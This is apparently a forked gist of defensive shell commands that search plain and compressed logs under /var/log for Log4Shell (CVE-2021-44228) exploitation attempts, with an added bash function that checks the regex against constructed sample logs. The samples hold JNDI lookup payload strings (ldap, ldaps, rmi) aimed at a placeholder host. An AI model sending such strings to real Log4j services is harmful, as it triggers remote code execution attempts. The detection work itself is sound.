@tahslim
Forked from Neo23x0/log4j_rce_detection.md
Created December 11, 2021 09:45
Log4j RCE CVE-2021-44228 Exploitation Detection

You can use these commands to search for exploitation attempts against the log4j RCE vulnerability CVE-2021-44228.

This command searches for exploitation attempts in uncompressed files in the folder /var/log and all subfolders:

sudo grep -E -i -r '\$\{jndi:(ldap[s]?|rmi)://' /var/log

This command searches for exploitation attempts in compressed files in the folder /var/log and all subfolders:

sudo find /var/log -name \*.gz -print0 | xargs -0 zgrep -E -i '\$\{jndi:(ldap[s]?|rmi)://'
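
Added example (not part of the original gist): both searches combined into one function and run against constructed log files, so the pattern's coverage (ldap, ldaps, rmi, any letter case) can be checked before pointing it at /var/log. The names scan_jndi and make_sample_logs, the host.invalid strings and the sample log lines are assumptions made for this example; `xargs -r` assumes GNU or BusyBox xargs.

```bash
# Added example. PATTERN is the regex from the two commands above, unchanged.
PATTERN='\$\{jndi:(ldap[s]?|rmi)://'

# scan_jndi DIR (hypothetical helper name)
# Prints "file:matching line" for every hit in plain and gzip-compressed files
# under DIR. Returns 0 when at least one hit exists, 1 when there is none.
scan_jndi() {
  jndi_hits=$(
    # Plain files; *.gz is excluded here because zgrep handles it below.
    grep -E -i -r -H --exclude='*.gz' "$PATTERN" "$1" || true
    # Compressed files; -r keeps xargs from running zgrep with no file names.
    find "$1" -type f -name '*.gz' -print0 |
      xargs -0 -r zgrep -E -i -H "$PATTERN" || true
  )
  [ -n "$jndi_hits" ] || return 1
  printf '%s\n' "$jndi_hits"
}

# make_sample_logs DIR (hypothetical helper): writes constructed log files.
make_sample_logs() {
  printf '%s\n' \
    '10.0.0.5 - - "GET / HTTP/1.1" 200 "Mozilla/5.0"' \
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${jndi:ldap://host.invalid/a}"' \
    '10.0.0.9 - - "GET /?q=${JNDI:RMI://host.invalid/b} HTTP/1.1" 404 "-"' \
    > "$1/app.log"
  # Mentions jndi but is not a lookup string, so it must not be reported.
  printf '%s\n' 'INFO jndi lookups disabled by configuration' > "$1/clean.log"
  printf '%s\n' \
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${jndi:ldaps://host.invalid/c}"' \
    > "$1/app.log.1"
  gzip "$1/app.log.1"   # becomes app.log.1.gz
}

# Demo on the constructed data: two hits from app.log, one from app.log.1.gz.
demo_dir=$(mktemp -d)
make_sample_logs "$demo_dir"
scan_jndi "$demo_dir"
rm -rf "$demo_dir"
```

On a real host, run the script with the same privileges the commands above use sudo for, and treat a return value of 1 as "no match for this pattern", not as proof the host was never probed.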